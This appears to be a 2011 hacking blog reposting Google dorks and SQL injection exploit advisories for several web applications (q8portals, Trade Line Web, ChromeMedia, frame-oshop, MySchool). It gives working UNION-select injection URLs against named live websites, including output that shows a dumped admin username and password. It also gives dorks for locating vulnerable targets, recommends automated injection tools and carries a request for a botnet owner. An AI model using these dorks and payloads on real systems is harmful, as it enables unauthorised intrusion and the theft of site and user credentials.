This dork reveals sensitive information that may be used for hacking.
dork: inurl:loader-wizard ext:php

[Dork] More Accurate vBulletin installation finder [Dork]

inurl:/install/install.php intitle:vBulletin * Install System

use this with an google based search engine (www.google.com) 

Sunday, May 29, 2011

Nice hacking forum

this guy has some real sh!t going

A lot of useful software for hacking

All his software is coded by him.
Go to this site; he has a lot of nice software and tools. Don't leech.

All in One Tools & Tutorials

Go to the link; learn to hack by watching and doing it yourself.

Saturday, May 28, 2011

Q8Portals SQL Injection Vulnerability

Q8portals [asp] SQL Injection Vulnerability

[+]Title :.......Q8portals [asp] SQL Injection Vulnerability
[+]Author :......Net.Edit0r
[+]Tested on :...Win Xp Sp 2/3
[~]Date :.............2011-05-13
[~] Found by Net.Edit0r
[~] Team: Black Hat Group
[~] Contact: Black.hat.tm@Gmail.Com
[~] Home: http://Black-HG.Org & http://Security-War.Com
[~] Vendor: http://www.Q8portals.com
[~] Category:: [webapps]

==========ExPl0iT3d by Net.Edit0r==========

[+] DORK: intext:Powered by: q8portals.com

[+] Description: Start by using the command having 1=1 to find the name of
the first table; then, using the command (order by), you will find the
other table names.

[ I ].   SQL Vulnerability

[+++] Important: For Sql Injection easily program such Havij and use Hmei7



[L!v3 D3m0's]:




12 May 2011 - Vulnerability discovered.
13  May 2011   - Advisory released.

[!] Black Hat Group ./Iranian HackerZ
[!] MaiL: Black.Hat.tm@Gmail.Com ~ Net.Edit0r@Att.Net
[!] Greetz To : DarkCoder | p3nt3st3r | Amir-MaGiC | 3H34N | H3x |
D3adlY & All Iranian HackerZ
[!] Spec Th4nks:  HUrr!c4nE   | Virangar | B3hz4d |  M4Hd1 | Mr.Xhat |
Immortal Boy |
 __SENATOR__ | And All My Friendz
[!] Persian Gulf 4 Ever

Trade Line Web SQLi Vulnerability

Trade Line Web <= Remote 'id' Funcs SQL-i Vulnerabilities
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KnocKout member from Inj3ct0r Team                1
1               #########################################              0
[~] Live Contact : knockoutr@msn.com
[~] E-Mail : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com - http://1337day.com
Special greetz to : and Indonesian Backtrack Team - 0nto.me|09exploit.com 
My inj3ct0r Brothers.:) 
 r0073r (~) Sid3^effectS (~) r4dc0re (~) Indoushka (~) eXeSoul (~) eidelweiss (~) SeeMe (~)
 XroGuE (~) agix (~) KedAns-Dz (~) gunslinger_ (~) Sn!pEr.S!Te (~) ZoRLu (~) anT!-Tr0J4n 
Note:' i Need botnet Owner friend! ' 
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Trade Line Web
|~Price : N/A
|~Version : N/A
|~Software: http://www.tradelineweb.com/
|~Vulnerability Style : SQL INJECTION
|~Vulnerability Dir : /
|~Google Keyword : "Trade Line Web" inurl:detay.php
|[~]Date : "19.05.2011"
|[~]Tested on :
urunler.php <= 'ID' Functions Not Security
detay.php <= 'ID' Functions Not Security
                 Example| Exploitation
                 SQL Injecting.. 
                 Target : http://www.chickenstrade.com/detay.php?id=-288%20and%201=1%20union%20select%201,2,group_concat%28column_name%29,4,5,6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=0x7573657273&tur=urun
                 Mysql Writes: id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan,id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan,id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan,id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan,id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan

                    Hm... ok.
                 SQL Injecting..
                 Target : http://www.parkdijital.com/urunler.php?kat_id=8%20and%201=1%20union%20select%201,group_concat%28id,0x3a,username,0x3a,password%29,3,4,5,6,7,8,9,10,11%20from%20users%20where%20id=1
                 Mysql Writes: 1:admin:12345
                    Hmm... ok.
                 SQL Injecting..
                 Target : http://www.kececigroup.com/detay.php?id=-288%20and%201=1%20union%20select%201,2,@@version,4,5,6,7,8,9,10,11%20from%20users%20where%20id=1&tur=urun
                 Mysql Writes : 5.0.90


                .__        _____        _______                 
                |  |__    /  |  |___  __\   _  \_______   ____  
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \ 
                |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/ 
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/            \/ 
                        /   _____/\_   _____/\_   ___ \ 
                        \_____  \  |    __)_ /    \  \/ 
                        /        \ |        \\     \____
                       /_______  //_______  / \______  /
                               \/         \/         \/ 
                                     Was Here.                HTTP://H4X0RESEC.BLOGSOT.COM

Web Design by ChromeMedia Exploit

0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                  0
1  [+] Support e-mail  : submit[at]1337day.com                        1
0                                                                      0
1               #########################################              1
0               I'm kalashinkov3 member from Inj3ct0r Team              1
1               #########################################              0

# Title : ChromeMedia SQL Injection Vulnerability
# Author: Kalashinkov3
# Vendor: [www.chromemedia.com]
# Email : kalashinkov3[at]Hotmail[dot].Fr
# Date : 22/05/2011
# Google Dork : intext:"Web Design by ChromeMedia Inc" inurl:*.php?
# Category  : PHP [SQli]       


# http://[localhost]/*/*/article.php?content_id='22
# http://[localhost]/*/*/article.php?content_id=[SQLI]

# http://[localhost]/*/*/details.php?product_id='20
# http://[localhost]/*/*/details.php?product_id=[SQLI]

# all php files "*.php?*_id= " are vulnerable #

^_^ G00d LUCK ALL :=)

# Greets To : BrOx-dz & all Algerian Hackers ;) & all members of 1337Day #

Friday, May 27, 2011

frame-oshop Sqli vuln

product:    frame-oshop
vendor:     http://www.sdaxx.de/
date:       15.05.2011
status:     0day
version:    i dunno...
PoC: http://www.host.com/shop/main.php?id=1111&show=rubrik&rid=-1%20union%20select%201,2,3,4,version(),6,7,8,9,10,11,12
Dork:       "2006 by Sdaxx Rostock" intitle:"frame-oshop"
Note:       -sessid had to be fresh
        -there are more vuln...
>>published by -SmoG- on SceneGround.info<<
greetz to my mentor Therion, c0x and other sg-members!

SQL Injection MySchool Version 7.02

# Google Dork: "MySchool Version 7.02"
# Date: 05-21-2011
# Software Link: http://em.com.eg/
# Version: Version 7.02
# Author: az7rb
# Tested on : winxp sp3 Ar end bt5
# Homepage : www.p0c.cc
# Greetz : p0c Team & Dr.NaNo & All My Msn Messenger Friends
#################### wWw.p0c.cc #####################
# SQL :
# Example :
# SQL 2 :
# Example :
# Link Control Panel :